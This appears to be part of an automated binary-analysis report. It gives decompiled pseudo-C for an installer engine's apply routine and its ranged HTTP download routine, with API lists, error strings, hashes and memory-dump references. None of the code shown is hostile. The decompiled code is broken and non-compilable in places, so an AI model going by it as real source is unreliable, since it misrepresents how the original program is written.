                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410C48, Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 338synchronizationthreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 61%
                                                                                                                                                                  			E00410C48(signed short _a4, signed int _a8) {
				signed short _v8;
				void* _v12;
				void* _v16;
				signed short _v20;
				char _v24;
				signed short _v28;
				signed short _v32;
				signed short _v36;
				char _v40;
				signed short* _v44;
				char* _v48;
				void _v52;
				void* __ebx;
				intOrPtr* _t100;
				void* _t110;
				intOrPtr* _t111;
				void* _t122;
				signed short _t136;
				signed short _t139;
				signed short _t146;
				signed short _t151;
				void* _t160;
				void* _t164;
				signed short _t166;
				signed short _t169;

				_t146 = _a4;
				_v32 =  *(_t146 + 0x3f0);
				asm("stosd");
				asm("stosd");
				_push(0x2000012c);
				_push(2);
				_v40 = 0;
				_v12 = 0;
				_v24 = 0;
				_v16 = 0;
				_v36 = 0;
				_v28 = 0;
				_v8 = 0;
				_v20 = 0;
				_a4 = 0;
				asm("stosd");
				E00402003();
				_t15 = _t146 + 0xb8; // 0xb8
				_t162 = _t15;
				if(E00408682(_t15,  &_v40) >= 0) {
					_t16 = _t146 + 0x2a8; // 0x2a8
					E0042258B(__eflags, _t162, _t16);
					_t100 =  *((intOrPtr*)(_t146 + 0xc8));
					_t150 =  *_t100;
					_t166 = E00408843(_t162, 1,  *((intOrPtr*)( *_t100 + 0x60))(_t100));
					__eflags = _t166;
					if(_t166 >= 0) {
						__eflags =  *((intOrPtr*)(_t146 + 0x30)) - 3;
						if( *((intOrPtr*)(_t146 + 0x30)) != 3) {
							_push( &_v12);
							_push(0);
							_t166 = E004223EF();
							__eflags = _t166;
							if(__eflags >= 0) {
								E004223E3(_t104);
								_t24 = _t146 + 0x88; // 0x88
								_t163 = _t24;
								 *(_t146 + 0xf0) = _a8;
								_t166 = E004225BC(__eflags, _t24);
								__eflags = _t166;
								if(_t166 >= 0) {
									_t151 = 0;
									__eflags =  *(_t146 + 0x418);
									if( *(_t146 + 0x418) != 0) {
										L18:
										_t30 = _t146 + 0x468; // 0x468
										_t108 = _t30;
										__eflags =  *_t108 - _t151;
										if( *_t108 != _t151) {
											L22:
											__eflags =  *((intOrPtr*)(_t146 + 0x3e4)) - _t151;
											if( *((intOrPtr*)(_t146 + 0x3e4)) == _t151) {
												L28:
												__eflags =  *(_t146 + 0x3e8);
												if(__eflags == 0) {
													L32:
													__eflags =  *(_t146 + 0x428);
													if( *(_t146 + 0x428) == 0) {
														_t164 = _v16;
														L41:
														__eflags =  *(_t146 + 0x438);
														if(__eflags != 0) {
															_t166 = E0042229D(__eflags, _t146, _t164,  &_v24,  &_v32,  &_v8,  &_v20,  &_a4);
															_t63 = _t146 + 0xb8; // 0xb8
															_t108 = E004087D4(_t63, _t166);
														}
														__eflags = _t164;
														if(_t164 == 0) {
															L46:
															__eflags = _t166;
															if(_t166 >= 0) {
																__eflags = _v8;
																if(_v8 == 0) {
																	__eflags = _v20;
																	if(_v20 == 0) {
																		__eflags = _a4 - 2;
																		if(_a4 != 2) {
																			__eflags =  *(_t146 + 0x448);
																			if( *(_t146 + 0x448) != 0) {
																				_t69 = _t146 + 0x3d8; // 0x3d8
																				_t70 = _t146 + 0xb8; // 0xb8
																				_t108 = E00422274(_t70, _t69,  *((intOrPtr*)(_t146 + 0x47c)));
																			}
																		}
																	}
																}
															}
															goto L52;
														} else {
															_t108 = E00410BA1(_t151, _t164);
															__eflags = _t166;
															if(_t166 < 0) {
																L52:
																__eflags = _v28;
																if(_v28 == 0) {
																	L62:
																	__eflags = _v36;
																	if(_v36 != 0) {
																		_t108 = E00416171(_t151,  *((intOrPtr*)(_t146 + 0x47c)));
																	}
																	goto L64;
																}
																__eflags = _v32;
																if(_v32 != 0) {
																	L56:
																	_t151 = 1;
																	__eflags = 1;
																	L57:
																	__eflags = _t166;
																	if(_t166 < 0) {
																		L60:
																		_t122 = 1;
																		__eflags = 1;
																		L61:
																		_t108 = E004225F7(_t160, _t146, _t122, _t151, _v20, _a4);
																		goto L62;
																	}
																	__eflags = _v8;
																	if(_v8 != 0) {
																		goto L60;
																	}
																	_t122 = 0;
																	goto L61;
																}
																__eflags =  *(_t146 + 0x3f4);
																if( *(_t146 + 0x3f4) != 0) {
																	goto L56;
																}
																_t151 = 0;
																goto L57;
															}
															_t166 = _t108;
															goto L46;
														}
													}
													_v48 =  &_v24;
													_v44 =  &_v8;
													_v52 = _t146;
													_t164 = CreateThread(0, 0, E0040FCB4,  &_v52, 0, 0);
													_v16 = _t164;
													__eflags = _t164;
													if(_t164 != 0) {
														__eflags =  *(_t146 + 0x3b8);
														if( *(_t146 + 0x3b8) != 0) {
															goto L41;
														}
														_t166 = E00410BA1(_t151, _t164);
														__eflags = _t166;
														if(_t166 >= 0) {
															_t108 = CloseHandle(_t164);
															_t164 = 0;
															_v16 = 0;
															goto L41;
														}
														_push("Failed while caching, aborting execution.");
														L38:
														_t108 = E00430A57();
														_t151 = _t166;
														goto L52;
													}
													_t136 = GetLastError();
													__eflags = _t136;
													_t169 =  <=  ? _t136 : _t136 & 0x0000ffff | 0x80070000;
													__eflags = _t169;
													_t166 =  >=  ? 0x80004005 : _t169;
													E004300D9(0x80004005, "core.cpp", 0x24e, _t166);
													_push("Failed to create cache thread.");
													goto L38;
												}
												_t166 = E004223F4(_t146, _t151, _t160, __eflags, _t146);
												__eflags = _t166;
												if(_t166 >= 0) {
													_v28 = 1;
													goto L32;
												}
												_push("Failed to register bundle.");
												_t108 = E00430A57();
												_t151 = _t166;
												goto L62;
											}
											_t139 = E004114D0(_t146,  *(_t146 + 0xf0));
											__eflags = _t139;
											if(_t139 >= 0) {
												__eflags =  *(_t146 + 0x3b4);
												_t166 = E004160A6( *(_t146 + 0x3b4),  *((intOrPtr*)(_t146 + 0x47c)), _t163,  *((intOrPtr*)(_t146 + 0x3d8)),  *((intOrPtr*)(_t146 + 0x45c)), 0 |  *(_t146 + 0x3b4) == 0x00000000);
												__eflags = _t166;
												if(_t166 >= 0) {
													_v36 = 1;
													goto L28;
												}
												_push("Another per-machine setup is already executing.");
												goto L11;
											}
											_push("Failed to elevate.");
											goto L11;
										}
										_t166 = _t108;
										__eflags = _t166;
										if(_t166 >= 0) {
											_t151 = 0;
											__eflags = 0;
											goto L22;
										}
										_push("Failed to cache engine to working directory.");
										goto L11;
									}
									__eflags =  *(_t146 + 0x428);
									if( *(_t146 + 0x428) != 0) {
										goto L18;
									}
									__eflags =  *(_t146 + 0x438);
									if( *(_t146 + 0x438) != 0) {
										goto L18;
									}
									__eflags =  *(_t146 + 0x448);
									if( *(_t146 + 0x448) != 0) {
										goto L18;
									}
									_push(0xa000017c);
									_push(2);
									_t108 = E00402003();
									goto L12;
								} else {
									_push("Failed to set initial apply variables.");
									L11:
									_push(_t166);
									_t108 = E00430A57();
									L12:
									L64:
									_t79 = _t146 + 0xb8; // 0xb8
									_t162 = _t79;
									goto L65;
								}
							} else {
								_push("Another per-user setup is already executing.");
								goto L2;
							}
						} else {
							_t166 = 0x8007015e;
							_a4 = 1;
							_t108 = E004089F8(_t150,  *((intOrPtr*)(_t146 + 0xc8)), 5, 0, 0x8007015e, 0, 0x10, 0);
							goto L65;
						}
					} else {
						E004300D9(_t102, "core.cpp", 0x20c, _t166);
						_push("UX aborted apply begin.");
						goto L2;
					}
				} else {
					_push("Engine cannot start apply because it is busy with another action.");
					L2:
					_push(_t166);
					_t108 = E00430A57();
					L65:
					 *(_t146 + 0xf0) =  *(_t146 + 0xf0) & 0x00000000;
					E004225EB(_t108);
					if(_v12 != 0) {
						ReleaseMutex(_v12);
						CloseHandle(_v12);
					}
					if(_v40 != 0) {
						E00408728(_t162);
					}
					_t110 = _v16;
					if(_t110 != 0) {
						CloseHandle(_t110);
					}
					_push(_a4);
					_t111 =  *((intOrPtr*)(_t146 + 0xc8));
					_push(_t166);
					_push(_t111);
					if( *((intOrPtr*)( *_t111 + 0xc8))() == 0x66) {
						 *(_t146 + 0x18) = 1;
					}
					_push(E0040E33B( *(_t146 + 0x18)));
					_push(E0040E8CE(_a4));
					E00402003(2, 0x2000018f, _t166);
					return _t166;
				}
			}




























                                                                                                                                                                  0x00410c4f
                                                                                                                                                                  0x00410c5a
                                                                                                                                                                  0x00410c64
                                                                                                                                                                  0x00410c65
                                                                                                                                                                  0x00410c66
                                                                                                                                                                  0x00410c6b
                                                                                                                                                                  0x00410c6d
                                                                                                                                                                  0x00410c70
                                                                                                                                                                  0x00410c73
                                                                                                                                                                  0x00410c76
                                                                                                                                                                  0x00410c79
                                                                                                                                                                  0x00410c7c
                                                                                                                                                                  0x00410c7f
                                                                                                                                                                  0x00410c82
                                                                                                                                                                  0x00410c85
                                                                                                                                                                  0x00410c88
                                                                                                                                                                  0x00410c89
                                                                                                                                                                  0x00410c94
                                                                                                                                                                  0x00410c94
                                                                                                                                                                  0x00410ca4
                                                                                                                                                                  0x00410cb8
                                                                                                                                                                  0x00410cc0
                                                                                                                                                                  0x00410cc5
                                                                                                                                                                  0x00410ccc
                                                                                                                                                                  0x00410cda
                                                                                                                                                                  0x00410cdc
                                                                                                                                                                  0x00410cde
                                                                                                                                                                  0x00410cf7
                                                                                                                                                                  0x00410cfb
                                                                                                                                                                  0x00410d26
                                                                                                                                                                  0x00410d27
                                                                                                                                                                  0x00410d2e
                                                                                                                                                                  0x00410d30
                                                                                                                                                                  0x00410d32
                                                                                                                                                                  0x00410d3e
                                                                                                                                                                  0x00410d46
                                                                                                                                                                  0x00410d46
                                                                                                                                                                  0x00410d4d
                                                                                                                                                                  0x00410d58
                                                                                                                                                                  0x00410d5a
                                                                                                                                                                  0x00410d5c
                                                                                                                                                                  0x00410d70
                                                                                                                                                                  0x00410d72
                                                                                                                                                                  0x00410d78
                                                                                                                                                                  0x00410da0
                                                                                                                                                                  0x00410da0
                                                                                                                                                                  0x00410da0
                                                                                                                                                                  0x00410da6
                                                                                                                                                                  0x00410da8
                                                                                                                                                                  0x00410dd6
                                                                                                                                                                  0x00410dd6
                                                                                                                                                                  0x00410ddc
                                                                                                                                                                  0x00410e35
                                                                                                                                                                  0x00410e35
                                                                                                                                                                  0x00410e3c
                                                                                                                                                                  0x00410e63
                                                                                                                                                                  0x00410e63
                                                                                                                                                                  0x00410e6a
                                                                                                                                                                  0x00410f09
                                                                                                                                                                  0x00410f0c
                                                                                                                                                                  0x00410f0c
                                                                                                                                                                  0x00410f13
                                                                                                                                                                  0x00410f30
                                                                                                                                                                  0x00410f33
                                                                                                                                                                  0x00410f3a
                                                                                                                                                                  0x00410f3a
                                                                                                                                                                  0x00410f3f
                                                                                                                                                                  0x00410f41
                                                                                                                                                                  0x00410f4f
                                                                                                                                                                  0x00410f4f
                                                                                                                                                                  0x00410f51
                                                                                                                                                                  0x00410f53
                                                                                                                                                                  0x00410f57
                                                                                                                                                                  0x00410f59
                                                                                                                                                                  0x00410f5d
                                                                                                                                                                  0x00410f5f
                                                                                                                                                                  0x00410f63
                                                                                                                                                                  0x00410f65
                                                                                                                                                                  0x00410f6c
                                                                                                                                                                  0x00410f74
                                                                                                                                                                  0x00410f7b
                                                                                                                                                                  0x00410f82
                                                                                                                                                                  0x00410f82
                                                                                                                                                                  0x00410f6c
                                                                                                                                                                  0x00410f63
                                                                                                                                                                  0x00410f5d
                                                                                                                                                                  0x00410f57
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410f43
                                                                                                                                                                  0x00410f44
                                                                                                                                                                  0x00410f49
                                                                                                                                                                  0x00410f4b
                                                                                                                                                                  0x00410f87
                                                                                                                                                                  0x00410f87
                                                                                                                                                                  0x00410f8b
                                                                                                                                                                  0x00410fc2
                                                                                                                                                                  0x00410fc2
                                                                                                                                                                  0x00410fc6
                                                                                                                                                                  0x00410fce
                                                                                                                                                                  0x00410fce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410fc6
                                                                                                                                                                  0x00410f8d
                                                                                                                                                                  0x00410f91
                                                                                                                                                                  0x00410fa0
                                                                                                                                                                  0x00410fa2
                                                                                                                                                                  0x00410fa2
                                                                                                                                                                  0x00410fa3
                                                                                                                                                                  0x00410fa3
                                                                                                                                                                  0x00410fa5
                                                                                                                                                                  0x00410fb1
                                                                                                                                                                  0x00410fb3
                                                                                                                                                                  0x00410fb3
                                                                                                                                                                  0x00410fb4
                                                                                                                                                                  0x00410fbd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410fbd
                                                                                                                                                                  0x00410fa7
                                                                                                                                                                  0x00410fab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410fad
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410fad
                                                                                                                                                                  0x00410f93
                                                                                                                                                                  0x00410f9a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410f9c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410f9c
                                                                                                                                                                  0x00410f4d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410f4d
                                                                                                                                                                  0x00410f41
                                                                                                                                                                  0x00410e75
                                                                                                                                                                  0x00410e7d
                                                                                                                                                                  0x00410e8d
                                                                                                                                                                  0x00410e96
                                                                                                                                                                  0x00410e98
                                                                                                                                                                  0x00410e9b
                                                                                                                                                                  0x00410e9d
                                                                                                                                                                  0x00410ed4
                                                                                                                                                                  0x00410edb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410ee3
                                                                                                                                                                  0x00410ee5
                                                                                                                                                                  0x00410ee7
                                                                                                                                                                  0x00410efc
                                                                                                                                                                  0x00410f02
                                                                                                                                                                  0x00410f04
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410f04
                                                                                                                                                                  0x00410ee9
                                                                                                                                                                  0x00410eee
                                                                                                                                                                  0x00410eef
                                                                                                                                                                  0x00410ef5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410ef5
                                                                                                                                                                  0x00410e9f
                                                                                                                                                                  0x00410eae
                                                                                                                                                                  0x00410eb0
                                                                                                                                                                  0x00410eb8
                                                                                                                                                                  0x00410eba
                                                                                                                                                                  0x00410ec8
                                                                                                                                                                  0x00410ecd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410ecd
                                                                                                                                                                  0x00410e44
                                                                                                                                                                  0x00410e46
                                                                                                                                                                  0x00410e48
                                                                                                                                                                  0x00410e5c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410e5c
                                                                                                                                                                  0x00410e4a
                                                                                                                                                                  0x00410e50
                                                                                                                                                                  0x00410e56
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410e56
                                                                                                                                                                  0x00410de5
                                                                                                                                                                  0x00410dec
                                                                                                                                                                  0x00410dee
                                                                                                                                                                  0x00410dfc
                                                                                                                                                                  0x00410e1e
                                                                                                                                                                  0x00410e20
                                                                                                                                                                  0x00410e22
                                                                                                                                                                  0x00410e2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410e2e
                                                                                                                                                                  0x00410e24
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410e24
                                                                                                                                                                  0x00410df0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410df0
                                                                                                                                                                  0x00410dc7
                                                                                                                                                                  0x00410dc9
                                                                                                                                                                  0x00410dcb
                                                                                                                                                                  0x00410dd4
                                                                                                                                                                  0x00410dd4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410dd4
                                                                                                                                                                  0x00410dcd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410dcd
                                                                                                                                                                  0x00410d7a
                                                                                                                                                                  0x00410d80
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410d82
                                                                                                                                                                  0x00410d88
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410d8a
                                                                                                                                                                  0x00410d90
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410d92
                                                                                                                                                                  0x00410d97
                                                                                                                                                                  0x00410d99
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410d5e
                                                                                                                                                                  0x00410d5e
                                                                                                                                                                  0x00410d63
                                                                                                                                                                  0x00410d63
                                                                                                                                                                  0x00410d64
                                                                                                                                                                  0x00410d69
                                                                                                                                                                  0x00410fd3
                                                                                                                                                                  0x00410fd3
                                                                                                                                                                  0x00410fd3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410fd3
                                                                                                                                                                  0x00410d34
                                                                                                                                                                  0x00410d34
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410d34
                                                                                                                                                                  0x00410cfd
                                                                                                                                                                  0x00410d03
                                                                                                                                                                  0x00410d12
                                                                                                                                                                  0x00410d19
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410d19
                                                                                                                                                                  0x00410ce0
                                                                                                                                                                  0x00410ceb
                                                                                                                                                                  0x00410cf0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410cf0
                                                                                                                                                                  0x00410ca6
                                                                                                                                                                  0x00410ca6
                                                                                                                                                                  0x00410cab
                                                                                                                                                                  0x00410cab
                                                                                                                                                                  0x00410cac
                                                                                                                                                                  0x00410fd9
                                                                                                                                                                  0x00410fd9
                                                                                                                                                                  0x00410fe0
                                                                                                                                                                  0x00410fe9
                                                                                                                                                                  0x00410fee
                                                                                                                                                                  0x00410ff7
                                                                                                                                                                  0x00410ff7
                                                                                                                                                                  0x00411001
                                                                                                                                                                  0x00411004
                                                                                                                                                                  0x00411004
                                                                                                                                                                  0x00411009
                                                                                                                                                                  0x0041100e
                                                                                                                                                                  0x00411011
                                                                                                                                                                  0x00411011
                                                                                                                                                                  0x00411017
                                                                                                                                                                  0x0041101a
                                                                                                                                                                  0x00411020
                                                                                                                                                                  0x00411023
                                                                                                                                                                  0x0041102d
                                                                                                                                                                  0x0041102f
                                                                                                                                                                  0x0041102f
                                                                                                                                                                  0x0041103e
                                                                                                                                                                  0x00411047
                                                                                                                                                                  0x00411050
                                                                                                                                                                  0x0041105e
                                                                                                                                                                  0x0041105e

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00408682: EnterCriticalSection.KERNEL32(000000D0,00000000,000000B8,00000000,?,0041109A,000000B8,00000000,00000000,00000000,74EDA770), ref: 00408691
                                                                                                                                                                    • Part of subcall function 00408682: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 004086A0
                                                                                                                                                                    • Part of subcall function 00408682: LeaveCriticalSection.KERNEL32(000000D0,?,0041109A,000000B8,00000000,00000000,00000000,74EDA770), ref: 004086B5
                                                                                                                                                                  • CreateThread.KERNEL32 ref: 00410E90
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,004010F8,00000000,8BE275C0,?,00401414,00000000,?,?,?,?,00401EA4), ref: 00410E9F
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,004010F8,00000000,8BE275C0,?,00401414,00000000,?), ref: 00410EFC
                                                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,00000088,00000000,00000000,000000B8,00000001,00000000), ref: 00410FEE
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410FF7
                                                                                                                                                                  • CloseHandle.KERNEL32(00401414,00000088,00000000,00000000,000000B8,00000001,00000000), ref: 00411011
                                                                                                                                                                    • Part of subcall function 004223E3: SetThreadExecutionState.KERNEL32 ref: 004223E8
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to elevate., xrefs: 00410DF0
                                                                                                                                                                  • UX aborted apply begin., xrefs: 00410CF0
                                                                                                                                                                  • Failed to register bundle., xrefs: 00410E4A
                                                                                                                                                                  • Failed while caching, aborting execution., xrefs: 00410EE9
                                                                                                                                                                  • Engine cannot start apply because it is busy with another action., xrefs: 00410CA6
                                                                                                                                                                  • Failed to set initial apply variables., xrefs: 00410D5E
                                                                                                                                                                  • Failed to cache engine to working directory., xrefs: 00410DCD
                                                                                                                                                                  • Failed to create cache thread., xrefs: 00410ECD
                                                                                                                                                                  • Another per-user setup is already executing., xrefs: 00410D34
                                                                                                                                                                  • core.cpp, xrefs: 00410CE6, 00410EC3
                                                                                                                                                                  • Another per-machine setup is already executing., xrefs: 00410E24
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
                                                                                                                                                                  • String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp
                                                                                                                                                                  • API String ID: 2169948125-1544865161
                                                                                                                                                                  • Opcode ID: fce08840dbeed8db669ce1ad6f7c6f533a5b5391f67e737f00733be569f88cb4
                                                                                                                                                                  • Instruction ID: 8f4a0e46f18f1a404a5f416782b1ecca4c4e4891cd68b45663a0887cf3f8106d
                                                                                                                                                                  • Opcode Fuzzy Hash: fce08840dbeed8db669ce1ad6f7c6f533a5b5391f67e737f00733be569f88cb4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0DC1B671900215EBDF219F90D886BEF76A8AF04705F14017BFD04AA281DBF899C5CBAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042515A, Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 227filememoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                  			E0042515A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28, WCHAR* _a32, signed short _a36, signed short _a40, signed short _a44, signed short _a48, char _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				char _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				void* _v32;
				signed short _v36;
				signed short _v40;
				void* _t67;
				signed short _t68;
				signed short _t69;
				void* _t70;
				void* _t71;
				signed short _t90;
				signed short _t93;
				void* _t101;
				signed short _t103;
				void* _t110;
				signed short _t111;
				signed short _t112;
				signed short _t115;

				_t110 = 0;
				_t101 = 0;
				asm("xorps xmm0, xmm0");
				_t112 = 0;
				_v28 = 0;
				_v16 = 1;
				_v24 = 0;
				_v8 = 0;
				_v20 = 0;
				asm("movlpd [ebp-0x24], xmm0");
				_t67 = CreateFileW(_a32, 0xc0000000, 4, 0, 4, 0x80, 0);
				_v32 = _t67;
				if(_t67 != 0xffffffff) {
					_t68 = VirtualAlloc(0, 0x10000, 0x3000, 4);
					_v28 = _t68;
					__eflags = _t68;
					if(_t68 != 0) {
						_t69 = _a48;
						_t103 = _a44;
						_v12 = _t69;
						_a48 = _t103;
						while(1) {
							__eflags = _t103;
							if(_t103 != 0) {
								goto L8;
							}
							__eflags = _t69;
							if(_t69 != 0) {
								goto L8;
							}
							_t103 = _a36;
							_t69 = _a40;
							L11:
							_t112 = E00424FED(_a52, _a56, _t103, _t69,  &_v24);
							__eflags = _t112;
							if(_t112 < 0) {
								_push("Failed to allocate range request header.");
								_push(_t112);
								E00430A57();
								L31:
								__eflags = _t101;
								if(_t101 != 0) {
									InternetCloseHandle(_t101);
								}
								__eflags = _t110;
								if(_t110 != 0) {
									InternetCloseHandle(_t110);
								}
								L35:
								if(_v24 != 0) {
									E004380AB(_v24);
								}
								_t70 = _v28;
								if(_t70 != 0) {
									VirtualFree(_t70, 0, 0x8000);
								}
								_t71 = _v32;
								if(_t71 != 0xffffffff) {
									CloseHandle(_t71);
								}
								return _t112;
							}
							__eflags = _t110;
							if(_t110 != 0) {
								InternetCloseHandle(_t110);
								_t21 =  &_v8;
								 *_t21 = _v8 & 0x00000000;
								__eflags =  *_t21;
							}
							__eflags = _t101;
							if(_t101 != 0) {
								InternetCloseHandle(_t101);
								_t23 =  &_v20;
								 *_t23 = _v20 & 0x00000000;
								__eflags =  *_t23;
							}
							_t102 = _a20;
							_t112 = E004255EF(_a4, _a8, _a12, _a16, _a20, L"GET", _v24, _a24, _a28,  &_v8,  &_v20,  &_v16);
							__eflags = _t112;
							if(_t112 < 0) {
								E00430A57(_t112, "Failed to request URL for download: %ls",  *_t102);
								_t110 = _v8;
								_t101 = _v20;
								goto L31;
							} else {
								_t106 = _a48;
								_t101 = _v20;
								_t85 = _v12;
								__eflags = _t106;
								if(_t106 != 0) {
									L21:
									_t111 = _v16;
									L22:
									__eflags = _t111;
									if(_t111 == 0) {
										asm("xorps xmm0, xmm0");
										asm("movlpd [ebp+0x38], xmm0");
									}
									_t112 = E00425ADA(_t101, _v32,  &_a52, _a60, _t106, _t85, _v28, 0x10000, _a64);
									__eflags = _t112;
									if(_t112 < 0) {
										E00430A57(_t112, "Failed while reading from internet and writing to: %ls", _a32);
										_t110 = _v8;
										goto L31;
									} else {
										__eflags = _t111;
										_t110 = _v8;
										if(_t111 == 0) {
											goto L31;
										}
										_t69 = _v12;
										_t103 = _a48;
										continue;
									}
								}
								__eflags = _t85;
								if(_t85 != 0) {
									goto L21;
								}
								_t90 = E00438698(_t106, _t101,  &_v40);
								__eflags = _t90;
								if(_t90 < 0) {
									_t106 = _a36;
									_t85 = _a40;
									_t111 = 0;
									_a48 = _a36;
									_v12 = _a40;
									_v16 = 0;
									goto L22;
								}
								_t106 = _v40;
								_t85 = _v36;
								_a48 = _v40;
								_v12 = _v36;
								goto L21;
							}
							L8:
							__eflags = _a56 - _t69;
							if(__eflags > 0) {
								goto L31;
							}
							if(__eflags < 0) {
								goto L11;
							}
							__eflags = _a52 - _t103;
							if(_a52 >= _t103) {
								goto L31;
							}
							goto L11;
						}
					}
					_t93 = GetLastError();
					__eflags = _t93;
					_t115 =  <=  ? _t93 : _t93 & 0x0000ffff | 0x80070000;
					__eflags = _t115;
					_t112 =  >=  ? 0x80004005 : _t115;
					E004300D9(0x80004005, "downloadengine.cpp", 0x13c, _t112);
					_push("Failed to allocate buffer to download files into.");
					_push(_t112);
					E00430A57();
					goto L35;
				}
				_t118 =  <=  ? GetLastError() : _t97 & 0x0000ffff | 0x80070000;
				_t112 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t97 & 0x0000ffff | 0x80070000;
				E004300D9(0x80004005, "downloadengine.cpp", 0x137, _t112);
				E00430A57(_t112, "Failed to create download destination file: %ls", _a32);
				goto L35;
			}

























                                                                                                                                                                  0x00425178
                                                                                                                                                                  0x0042517a
                                                                                                                                                                  0x0042517c
                                                                                                                                                                  0x0042517f
                                                                                                                                                                  0x00425181
                                                                                                                                                                  0x00425184
                                                                                                                                                                  0x0042518b
                                                                                                                                                                  0x0042518e
                                                                                                                                                                  0x00425191
                                                                                                                                                                  0x00425194
                                                                                                                                                                  0x00425199
                                                                                                                                                                  0x0042519f
                                                                                                                                                                  0x004251a5
                                                                                                                                                                  0x004251f9
                                                                                                                                                                  0x004251ff
                                                                                                                                                                  0x00425202
                                                                                                                                                                  0x00425204
                                                                                                                                                                  0x00425246
                                                                                                                                                                  0x00425249
                                                                                                                                                                  0x0042524c
                                                                                                                                                                  0x0042524f
                                                                                                                                                                  0x00425252
                                                                                                                                                                  0x00425252
                                                                                                                                                                  0x00425254
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425256
                                                                                                                                                                  0x00425258
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042525a
                                                                                                                                                                  0x0042525d
                                                                                                                                                                  0x00425276
                                                                                                                                                                  0x00425287
                                                                                                                                                                  0x00425289
                                                                                                                                                                  0x0042528b
                                                                                                                                                                  0x00425398
                                                                                                                                                                  0x0042539d
                                                                                                                                                                  0x0042539e
                                                                                                                                                                  0x004253a5
                                                                                                                                                                  0x004253a5
                                                                                                                                                                  0x004253a7
                                                                                                                                                                  0x004253aa
                                                                                                                                                                  0x004253aa
                                                                                                                                                                  0x004253b0
                                                                                                                                                                  0x004253b2
                                                                                                                                                                  0x004253b5
                                                                                                                                                                  0x004253b5
                                                                                                                                                                  0x004253bb
                                                                                                                                                                  0x004253bf
                                                                                                                                                                  0x004253c4
                                                                                                                                                                  0x004253c4
                                                                                                                                                                  0x004253c9
                                                                                                                                                                  0x004253ce
                                                                                                                                                                  0x004253d8
                                                                                                                                                                  0x004253d8
                                                                                                                                                                  0x004253de
                                                                                                                                                                  0x004253e4
                                                                                                                                                                  0x004253e7
                                                                                                                                                                  0x004253e7
